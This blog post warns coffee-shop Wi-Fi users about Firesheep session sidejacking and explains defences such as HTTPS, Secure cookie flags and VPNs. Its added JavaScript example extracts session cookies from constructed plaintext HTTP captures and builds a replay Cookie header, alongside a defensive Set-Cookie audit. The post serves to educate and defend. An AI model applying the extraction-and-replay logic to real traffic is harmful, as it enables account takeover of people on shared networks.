Pay attention, my fellow readers. I know many of you travel or spend time in coffee shops and use free Wi-Fi hotspots, but there is a danger lurking out there. Developer Eric Butler has created a Firefox extension called Firesheep. This free extension captures session cookies that websites send over plain HTTP (no SSL) on an unprotected Wi-Fi network. Say what? In other words, Firesheep eavesdrops on an open Wi-Fi network, grabs the cookies that sites such as Facebook and Twitter use to identify a logged-in user, and lets the Firesheep user sidejack that session. Yes, I know this is old news from last October, but it is still an important problem.
Let developer Eric Butler explain from his blog post:
“As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed.”
All you have to do is double-click on their name in the Firesheep window and, open sesame, you are logged into that user's account. No password is needed: the captured session cookie is the credential.
Open sesame. Yikes.
Fortunately there are limitations to the extension. It only works where the attacker can see your packets, which is exactly what an open, unencrypted Wi-Fi connection gives to everyone in range. So let's say you are sitting at Starbucks checking your Facebook account. Someone else at that same Starbucks starts up Firesheep and scans the network. Firesheep sees your plain-HTTP session, grabs the cookies Facebook uses to identify you, and lets the Firesheep user masquerade as you. Did I mention that you will have no idea someone else just accessed your Facebook account? Nothing about your own browser changes; the site simply sees a second browser presenting your cookie.
Which sites are vulnerable? Firesheep shipped with handlers for Amazon.com, Basecamp, bit.ly, Cisco, CNET, Dropbox, Enom, Evernote, Facebook, Flickr, Foursquare, GitHub, Google, Gowalla, Hacker News, Harvest, Windows Live, NY Times, Pivotal Tracker, Slicehost, tumblr, Twitter, WordPress, Yahoo and Yelp, and probably many, many other sites are exposed the same way: any site that sends its session cookie over plain HTTP can be added with a new handler.
How do you deal with this? Don't use any unprotected Wi-Fi connection. Find another coffee shop that uses a password for their WPA connection, or convince your existing shop to start using one. Be aware of the caveat, though: on a WPA network with a shared password, anyone who knows that password and captures your connection setup can still decrypt your traffic, so the shop's password only raises the bar against strangers outside. The durable fix is on the website's side: serve the whole site over HTTPS and mark the session cookie Secure so the browser never sends it over plain HTTP. Until a site does that, use HTTPS wherever it is offered (the EFF's HTTPS Everywhere extension forces it for sites that support it) or run a VPN on public Wi-Fi.
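To make both halves of this concrete, the sniffing-and-replay step described above and the server-side cookie check that defeats it, here is an added example written for this post. It is not Firesheep's code and not any site's code. The captured requests are constructed for illustration, and the per-site handler table (which hosts and which cookie names make up a session) is an assumption modelled on Firesheep's idea of one handler per site; the cookie names are not claimed to be any site's real ones.

```javascript
// Added example, not Firesheep's own code. Shows (1) how plaintext HTTP
// requests captured on an open Wi-Fi network turn into replayable sessions
// and (2) the Set-Cookie audit a site owner should run to close the hole.
// Handler table and cookie names below are assumptions for illustration.

// Constructed sample capture: three payloads as they would appear on the wire.
// The first two are plaintext HTTP; the third is the start of a TLS
// ClientHello (an HTTPS connection), which carries no readable headers.
const CAPTURE = [
  "GET /home.php HTTP/1.1\r\n" +
    "Host: www.facebook.com\r\n" +
    "User-Agent: Mozilla/5.0\r\n" +
    "Cookie: datr=QmFy; c_user=100001234; xs=12%3Aabcdef\r\n" +
    "\r\n",
  "GET /timeline HTTP/1.1\r\n" +
    "Host: twitter.com\r\n" +
    "Cookie: lang=en\r\n" +            // logged-out visitor: no session cookie
    "\r\n",
  "\x16\x03\x01\x00\xc5\x01\x00\x00\xc1\x03\x03", // TLS record header bytes
];

// Hypothetical handler table (assumption): which cookies on which host
// together identify a logged-in session.
const HANDLERS = [
  { site: "Facebook", hosts: ["www.facebook.com", "facebook.com"], sessionCookies: ["c_user", "xs"] },
  { site: "Twitter",  hosts: ["twitter.com"], sessionCookies: ["auth_token"] },
];

// Parse one plaintext HTTP/1.x request. Returns null for anything that is
// not a request (e.g. TLS bytes), so encrypted traffic never matches.
function parseHttpRequest(payload) {
  const m = /^([A-Z]+) (\S+) HTTP\/1\.[01]\r\n/.exec(payload);
  if (!m) return null;
  const headerEnd = payload.indexOf("\r\n\r\n");
  const headerBlock = payload.slice(m[0].length, headerEnd === -1 ? payload.length : headerEnd);
  const headers = {};
  for (const line of headerBlock.split("\r\n")) {
    const idx = line.indexOf(":");
    if (idx === -1) continue;
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  const cookies = {};
  for (const pair of (headers["cookie"] || "").split(";")) {
    const eq = pair.indexOf("=");
    if (eq === -1) continue;
    cookies[pair.slice(0, eq).trim()] = pair.slice(eq + 1).trim();
  }
  return { method: m[1], path: m[2], host: headers["host"] || "", cookies };
}

// The sidejacking step: for each captured request, find a handler whose host
// matches and whose session cookies are all present. The result is exactly
// what the attacker needs to replay the session; no password is involved.
function findHijackableSessions(capture, handlers) {
  const sessions = [];
  for (const payload of capture) {
    const req = parseHttpRequest(payload);
    if (!req) continue;
    for (const h of handlers) {
      if (!h.hosts.includes(req.host)) continue;
      if (!h.sessionCookies.every((n) => n in req.cookies)) continue;
      const stolen = Object.fromEntries(h.sessionCookies.map((n) => [n, req.cookies[n]]));
      sessions.push({ site: h.site, host: req.host, cookies: stolen });
    }
  }
  return sessions;
}

// Build the Cookie header the attacker's browser would send to impersonate
// the victim (the "double-click" in Firesheep).
function replayCookieHeader(session) {
  return Object.entries(session.cookies).map(([k, v]) => `${k}=${v}`).join("; ");
}

// Defender-side check: audit a Set-Cookie header. Without the Secure
// attribute the browser also sends the cookie over plain http://, which is
// what makes it sniffable even when the login itself happened over HTTPS.
function auditSetCookie(setCookie) {
  const [nameValue, ...attrs] = setCookie.split(";").map((s) => s.trim());
  const name = nameValue.slice(0, nameValue.indexOf("="));
  const flags = new Set(attrs.map((a) => a.split("=")[0].toLowerCase()));
  const problems = [];
  if (!flags.has("secure")) problems.push("missing Secure: sent over plaintext HTTP too");
  if (!flags.has("httponly")) problems.push("missing HttpOnly: readable by page scripts");
  return { name, secure: flags.has("secure"), httpOnly: flags.has("httponly"), problems };
}

// Stand-alone run: one session is hijackable, the HTTPS bytes yield nothing.
for (const s of findHijackableSessions(CAPTURE, HANDLERS)) {
  console.log(`${s.site} session from ${s.host}: Cookie: ${replayCookieHeader(s)}`);
}
console.log(auditSetCookie("xs=12%3Aabcdef; Path=/; Domain=.facebook.com"));
console.log(auditSetCookie("xs=12%3Aabcdef; Path=/; Domain=.facebook.com; Secure; HttpOnly"));
```

Two things to notice when running it: the Twitter request is skipped because the visitor is not logged in (there is nothing to steal), and the TLS payload is skipped because there is nothing to parse, which is the whole point of HTTPS. The audit function is the check to run against your own site's login response: a session cookie without Secure will be sent by every browser over plain HTTP the moment a user follows an http:// link.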